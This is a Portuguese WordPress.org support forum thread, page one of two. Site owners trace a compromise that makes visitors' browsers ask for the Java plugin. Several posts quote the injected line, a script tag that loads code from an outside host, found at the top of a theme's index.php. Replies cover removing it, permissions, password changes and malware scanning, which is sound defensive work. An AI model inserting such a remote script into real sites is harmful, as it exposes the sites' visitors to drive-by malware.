Title: Meu site pede o plugin Java, é hacker?
Last modified: 6 agosto, 2016

---

# Meu site pede o plugin Java, é hacker?

 *  Resolvido [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/)
 * Hoje ao acessar o meu site, eu me deparei com um pedido do chrome para eu instalar
   o Plugin-Java.
 * Logo percebi que se tratava de um problema, pois o pouco que eu conheço do assunto,
   Java serve para acessar um computador certo?
    e não tem nada no meu site que 
   necessita de Java.
 * Outro problema que surgiu foi o no IE9
    parece que o doctype sumiu, e o site 
   entra em modo quick automaticamente.
 * Será que alguém invadiu meu site?
 * o site é [http://www.pururin.com.br](http://www.pururin.com.br)
 * o único problema que eu encontro é a minha pasta principal public_html
    que tem
   permissão 770, já tentei mudar e diz que não tenho autorização, já entrei em 
   contato com a UOL host e eles me falaram que não posso mudar a permissão dessa
   pasta.
 * Enfim, estou mais perdido que cego em tiroteiro, e não quero prejudicar as pessoas
   que acessam meu site. me ajudem!
 * obrigado desde já

Visualizando 15 respostas - 1 até 15 (de um total de 22)

1 [2](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/page/2/?output_format=md)
[→](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/page/2/?output_format=md)

 *  Criador do tópico [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20898)
 * Estou adicionando informação, eu fui no INDEX.php e encontrei um script suspeito:
 * `<script type="text/javascript" src="http://dichne.com/js/Check.php"></script
   >`
 * ele que faz chamar o java, e isso prova que alguém aplicou isso ali…
 * fiquei preocupado com a proteção do meu site, será que é a permissão 770 que 
   permitiu o individuo aplicar esse script ali?
 *  [Diana K. Cury](https://br.wordpress.org/support/users/dianakc/)
 * (@dianakc)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20901)
 * Olá,
 * Mantenha o WordPress sempre atualizado, a versão 2,9 tinha um problema de segurança
   desse tipo.
 * QUem pede o java em seu site diz ser o serviço dropbox (armazenagem de arquivos).
 *  Criador do tópico [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20902)
 * Obrigado pela resposta Diana, o meu wordpress está atualizado na última versão.
 * quanto ao java estar solicitando o dropbox, deve fazer parte do malware que foi
   aplicado.
 * sinto que terei que tirar o site do ar até o problema ser resolvido.
    para evitar
   que os meus usuários sejam prejudicados.
 * tem alguma forma de encontrar de onde está vindo essa requisição em java?
    qual
   parte do meu site?
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20903)
 * Estou com um problema similar, o mais estranho que ele só aconteceu após o upgrade
   para a nova versão… antes nunca passei por isso
 *  Criador do tópico [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20904)
 * Luke no meu caso estava normal, e aconteceu o problema derrepente…
    uma caractarística
   é o IE9 estar fixado na lateral esquerda.
 * eu estou procurando alguma forma de encontrar esse malware, alguém sabe como?
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20905)
 * Se for = ao meu ele esta na página index de seu tema, abra ela e olha se na primeira
   linha e encontre o código: <script type=”text/javascript” src=”[http://dichne.com/js/Check.php”></script&gt](http://dichne.com/js/Check.php”></script&gt);
 * Remova esse código que o problema desaparece…
 * A questão é como alguem alterou o arquivo??? essa é minha dúvida, e mesmo trocando
   pode ser que daqui um dia ou mais ou menos ele será alterado novamente e vc tem
   que ficar tirando o código…
 * Quero algo definitivo… comigo depois da atualização do wordpress aconteceu essa
   alteração 4 vezes
 *  Criador do tópico [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20906)
 * Luke, eu removi o mesmo <script> do topo,
    porém ele apenas forçava o navegador
   a pedir para instalar o JAVA. se a pessoa tem java ele ativa automaticamente.
   No firefox ele continua pedindo para aceitar o plugin para funcionar
 * e no IE9 continua jogado na lateral.
 * Não sei se foi o seu caso, mas o malware continua lá escondido.
 * de ultima opção vou pedir para a hospedagem restaurar o backup de 7 dias atrás.
   =/
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20907)
 * Então tem em outras páginas ou algo que ele esta chamando na index, dá uma olhada
   no código… no meu caso resolveu… mas depois de alguns dias volta
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20908)
 * Olhando o código html do seu site ele ainda tá lá
 * <script type=”text/javascript” src=”[http://dichne.com/js/Check.php”></script&gt](http://dichne.com/js/Check.php”></script&gt);
   
   <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “[http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt](http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt);
   <html xmlns=”[http://www.w3.org/1999/xhtml”&gt](http://www.w3.org/1999/xhtml”&gt);
 * <head>
 *  [Ricardo Moraleida](https://br.wordpress.org/support/users/moraleidame/)
 * (@moraleidame)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20911)
 * Pessoal, encontrei esse mesmo script na página de um cliente hoje cedo.
 * Qual hospedagem vcs estão usando? Pode ser uma coisa local… Esse cliente está
   na StarHost.
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20912)
 * Não é hospedagem… é alguma falha ou no wordpress e/ou em algum plugin…
 *  Criador do tópico [Thiago Alexandre](https://br.wordpress.org/support/users/thiago-alexandre/)
 * (@thiago-alexandre)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20913)
 * Ricardo Moraleida e luke_makey, a minha hospedagem é da UOL host.
 * Aconteceu depois que atualizei o wordpress para a versão 3.2.2
    se esse é o problema
   eu não sei, mas é uma possibilidade.
 * As permissões de pasta e arquivos de vocês estão corretas?
 *  [luke_makey](https://br.wordpress.org/support/users/luke_makey/)
 * (@luke_makey)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20914)
 * Também estou sismado com o meu também dar problema após a atualização para nova
   versão do wordpress… O meu esta na Alog…
 * Aparentemente no meu esta tudo ok, refiz várias configurações do site para tentar
   ver se resolve…
 * Mudei o arquivo que sempre é alterado para permissão 444 estou na esperança que
   isso resolva…
 * Mas o problema maior que vejo é que ninguem sabe o que é exatamente, isso é muito
   preocupante para que usa a plataforma wordpress…
 *  [Ricardo Moraleida](https://br.wordpress.org/support/users/moraleidame/)
 * (@moraleidame)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20915)
 * Pra mim está com cara de uma injeção simples.
 * O código estava na primeira linha do index.php em
 * > /wp-content/themes/tema/
 * Retirei, troquei as senhas, agora to terminando a verificação de BD e outros 
   arquivos pra ver se tem mais coisa.
 * O WP do cliente era 3.3.1.
 *  [Ricardo Moraleida](https://br.wordpress.org/support/users/moraleidame/)
 * (@moraleidame)
 * [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/#post-20916)
 * Ah, sim… antes de tirar, o script estava sendo acusado no Sucuri. Depois das 
   senhas trocadas e da linha apagada, agora ela lista como tudo certo:
 * [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)

Visualizando 15 respostas - 1 até 15 (de um total de 22)

1 [2](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/page/2/?output_format=md)
[→](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/page/2/?output_format=md)

O tópico ‘Meu site pede o plugin Java, é hacker?’ está fechado para novas respostas.

## Tags

 * [hacker](https://br.wordpress.org/support/topic-tag/hacker/)
 * [invasão](https://br.wordpress.org/support/topic-tag/invasao/)
 * [java](https://br.wordpress.org/support/topic-tag/java/)
 * [permissão](https://br.wordpress.org/support/topic-tag/permissao/)

 * Em: [Outros assuntos](https://br.wordpress.org/support/forum/miscelanea/)
 * 22 respostas
 * 4 participantes
 * Última resposta de: [Ricardo Moraleida](https://br.wordpress.org/support/users/moraleidame/)
 * Última atividade: [13 anos, 11 meses atrás](https://br.wordpress.org/support/topic/meu-site-pede-o-plugin-java-e-hacker/page/2/#post-20925)
 * Estado: resolvido

## Tópicos

### Tópicos mais populares

### Tópicos sem respostas

### Tópicos não relacionados a suporte

### Tópicos resolvidos

### Tópicos não resolvidos

### Todos os tópicos